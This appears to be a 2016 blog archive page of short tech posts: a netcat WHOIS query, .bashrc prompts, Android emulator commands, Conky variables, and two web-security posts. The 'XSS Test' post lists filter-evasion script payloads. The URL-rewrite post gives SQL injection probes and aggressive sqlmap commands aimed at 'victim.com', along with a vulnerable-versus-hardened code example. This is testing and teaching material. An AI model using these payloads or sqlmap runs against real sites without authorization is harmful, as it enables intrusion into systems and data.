Posts

Showing posts from September, 2016

Whois Domain by NetCat

WHOIS protocol with the Netcat tool:
# >nc -v 199.7.56.74 43
Ncat: Version 7.12 ( https://nmap.org/ncat )
Ncat: Connected to 199.7.56.74:43.
domain google.com
Whois Server Version 2.0
Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
   Domain Name: GOOGLE.COM
   Registrar: MARKMONITOR INC.
   Sponsoring Registrar IANA ID: 292
   Whois Server: whois.markmonitor.com
   Referral URL: http://www.markmonitor.com
   Name Server: NS1.GOOGLE.COM
   Name Server: NS2.GOOGLE.COM
   Name Server: NS3.GOOGLE.COM
   Name Server: NS4.GOOGLE.COM
   Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
   Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
   Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
   Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
   Status: serverTransferProhibited…

My .bashrc file "Saved"

export PS1="\[\033[38;5;14m\][\[$(tput sgr0)\]\[\033[38;5;10m\]\u\[$(tput sgr0)\]\[\033[38;5;11m\]@\[$(tput sgr0)\]\[\033[38;5;160m\]\h\[$(tput sgr0)\]\[\033[38;5;15m\] \[$(tput sgr0)\]\[\033[38;5;14m\]\W\[$(tput sgr0)\]\[\033[38;5;15m\] \[$(tput sgr0)\]\[\033[38;5;3m\]\l\[$(tput sgr0)\]\[\033[38;5;14m\]]\[$(tput sgr0)\]\[\033[38;5;15m\] \[$(tput sgr0)\]\[\033[38;5;11m\]\\$\[$(tput sgr0)\]\[\033[38;5;15m\] \[$(tput sgr0)\]"
or

PROMPT_COMMAND='echo -ne "\033]0;Terminal\007"'
PS1="\[\e[4;36m\]\h\[\e[1;31m\]$\[\e[0m\] "

Run Android Emulator Command Line

Run AVD GUI:
sdk/tools/# ./android avd
List All Images:
sdk/tools# ./emulator -list-avds
3_7_WVGA_Nexus_One_API_19
Galaxy_Nexus_API_18
Nexus_4_API_17
Run an Image:
sdk/tools/# ./emulator @Galaxy_Nexus_API_18

XSS Test

Let’s start…
Example 1:
<script> alert('1st example')</script>
Example 2:
<ScripT>alert('ex2')</ScripT>
Example 3:
<sc<script>ript>alert('ex3')</sc</script>ript>
Example 4:
<h1><font color=blue>ex4</h1><img src=" " onerror=alert('ex4')/>
Example 5:
";prompt('ex6');"
Example 6:
';alert('ex7');'
Example 7:
"><script>alert('ex8')</script>
Example 8:
# <script>alert('ex9')</alert>
That’s it for now. Stay tuned for more posts in the future…

SQL Injections in URL Rewrite

First of all, what is URL rewrite?
You’ve likely seen sites with this schema in URLs: http://victim.com/?id=1
Almost everyone knows how to test for SQL injection in this situation:
http://mysite.com/?id=1' or
http://mysite.com/?id=1 and 2.5=2.5 or
http://mysite.com/?id=1 and 3.4=3.5 and so on.
But with URL rewriting, this URL
http://victim.com/?id=1 will become
http://victim.com/1 (the id name is hidden and the value 1 is used in the URL path)

To test for SQL injection in this kind of URL, we use the same payloads as before, placed after the parameter value:
http://victim.com/1' or
http://victim.com/1 and 3.6=3.6
http://victim.com/1 and 3.6=3.77
and so on.
The results would be the same as a normal post parameter.
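Why the rewritten URL behaves the same, as an added example that is not code from the original post: a handler that pastes the path segment into the SQL text answers the two boolean probes above differently, while a handler that validates and binds the value rejects them. The rewrite rule, table, and function names are hypothetical, and the data is constructed.

```python
import re
import sqlite3
from urllib.parse import unquote

# Constructed sample data: an in-memory table standing in for the site's content.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)")
db.executemany("INSERT INTO posts VALUES (?, ?)", [(1, "first"), (2, "second")])

# Hypothetical rewrite rule: /<value> is served internally as /?id=<value>.
REWRITE = re.compile(r"^/(?P<id>.+)$")

def rewrite(path):
    """Recover the hidden id value from the pretty URL, as the web server would."""
    m = REWRITE.match(unquote(path))  # %20 and friends are decoded before routing
    return m.group("id") if m else None

def vulnerable_handler(path):
    """The path segment is concatenated into the SQL text, just like ?id= would be."""
    post_id = rewrite(path)
    if post_id is None:
        return "404 Not Found"
    sql = "SELECT title FROM posts WHERE id = " + post_id
    try:
        return [row[0] for row in db.execute(sql)]
    except sqlite3.Error as exc:
        return "SQL error: %s" % exc

def hardened_handler(path):
    """Accept only a short run of ASCII digits, then bind it as a query parameter."""
    post_id = rewrite(path)
    if post_id is None or not re.fullmatch(r"[0-9]{1,9}", post_id):
        return "400 Bad Request"
    rows = db.execute("SELECT title FROM posts WHERE id = ?", (int(post_id),))
    return [row[0] for row in rows]

if __name__ == "__main__":
    # The probe strings are the ones listed in the post.
    for path in ["/1", "/1 and 3.6=3.6", "/1 and 3.6=3.77", "/1'"]:
        print("%-18s vulnerable=%r hardened=%r"
              % (path, vulnerable_handler(path), hardened_handler(path)))
```

In an access log, the same probes show up as path segments containing encoded spaces, quotes, or comparison operators where only digits are expected, so a strict route pattern is also a useful detection point.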
To test for SQL injection with sqlmap, we just mark the injection point with a star (*). For instance:
sqlmap -u "http://victim.com/1*" --random-agent --level 5 --risk 3 --dbs
or
sqlmap -u "http://victim.com/content*/1" --random-agent --level 5 --risk 3 --dbs
For injecting in the content parameter, t…

Conky Variables " Commands "

Variable | Arguments (() = optional) | Explanation
acpiacadapter | (adapter) | ACPI ac adapter state. On Linux, the adapter option specifies the subfolder of /sys/class/power_supply containing the state information (tries "AC" and "ADP1" if there is no argument given). Non-Linux systems ignore it.
acpifan | | ACPI fan state
acpitemp | | ACPI temperature in C.
addr | (interface) | IP address for an interface, or "No Address" if no address is assigned.
addrs | (interface) | IP addresses for an interface (if one - works like addr). Linux only.
adt746xcpu | | CPU temperature from therm_adt746x
adt746xfan | | Fan speed from therm_adt746x
alignc | (num) | Align text to centre
alignr | (num) | Right-justify text, with space of N
apcupsd | host | Sets up the connection to apcupsd daemon. Prints nothing, defaults to localhost:3551
apcupsd_cable | | Prints the UPS connection type.
apcupsd_charge | | Cur…